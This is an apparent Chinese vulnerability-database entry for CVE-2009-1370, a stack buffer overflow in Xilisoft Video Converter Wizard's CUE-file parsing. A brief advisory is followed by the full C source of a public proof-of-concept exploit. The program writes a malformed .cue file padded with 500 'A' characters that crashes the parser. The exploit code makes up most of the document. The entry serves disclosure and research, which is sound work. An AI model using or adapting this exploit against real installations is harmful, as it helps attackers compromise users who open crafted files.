Xilisoft Video Converter Wizard CUE 'ape_plugin.plg'文件解析栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117564 漏洞类型 缓冲区溢出
发布时间 2009-04-10 更新时间 2009-04-23
CVE编号 CVE-2009-1370 CNNVD-ID CNNVD-200904-436
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8390
https://cxsecurity.com/issue/WLB-2009040227
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-436
|漏洞详情
XilisoftVideoConverterWizard是用于转换各种音频视频格式的工具。XilisoftVideoConverterWizard的ape_plugin.plg插件在解析CUE文件时存在栈溢出漏洞,用户受骗打开了特制的CUE文件就可以触发这个异常,导致执行任意代码。
|漏洞EXP
/*
----------------------------------------------------------------------------------------
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

name: xilisoft.cpp

Credits : fl0 fl0w
----------------------------------------------------------------------------------------
ScreanShot in the debugger

Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
----------------------------------------------------------------------------------------
*/

//Start

#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define     SIZE 100000

#define     FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."  

class EXPLOIT {
	public:
	
int check (char *, char *);
void Usage (char *);
 };
 
static int  Poz = 1;
static int  Neg = 0;
  
int i;      

char Name [SIZE];    
char NeWbuff [SIZE];
                                            

                                                  int main (int argc, char *argv [])                                                                                           

 { 
         
        EXPLOIT VIDEO;
        
             
             if ( argc < 2) 
             
                VIDEO.Usage ( argv [0]); 
       
                                                  if ( VIDEO.check ( argv [1], "-file") == Neg) { 
                                                   
                                                       fprintf ( stdout , " Incorect input "); 
                                                       
                                                       printf ( " \t..Usage is %s -file filename.. \n", Name);
                                                                                                                              
                                                               exit ( 0);
                                                            
                                                            }
                                               
                                                                                 
        
        
          do {
        
            NeWbuff [i] = 'A';
         
            i++;
               
            }while (i < 500);
               
       
        
        FILE *f;
        
        strcpy (Name, argv [2]);
        
        strcat (Name, " .cue ");
        
        f = fopen (Name, "w");
        
        assert ( f != NULL);
        
        
        
        
        strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF)); 
                                                                 
          
        
        fputs("FILE \"", f);
        
        fprintf ( f, " %s ", NeWbuff);
               
                
        fprintf ( stdout , "File build ! ");
         
        exit ( 0);  
         
       getchar ();
       
                                                   return 0;        
                                                  }
                                                                                                    

                                                         
  
                                                  int EXPLOIT::check (char *Arg_, char *_Arg)
   
   {
        
       if ( strcmp ( Arg_, _Arg) == 0)
       
        return Poz;
        
      return Neg;
        
        }   
        
    void EXPLOIT::Usage (char *Name)
    
   {
     system ("cls");    
     fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n ");
     printf ( " \t..Usage is %s -file filename.. \n", Name);    
     fprintf ( stdout , "..All Credits fl0 fl0w.. \n");
     
     
         }   
         
        
//EOF           

// milw0rm.com [2009-04-10]
|参考资料

来源:XF
名称:vcw-cue-bo(49807)
链接:http://xforce.iss.net/xforce/xfdb/49807
来源:BID
名称:34472
链接:http://www.securityfocus.com/bid/34472
来源:MILW0RM
名称:8390
链接:http://www.milw0rm.com/exploits/8390
来源:SECUNIA
名称:34660
链接:http://secunia.com/advisories/34660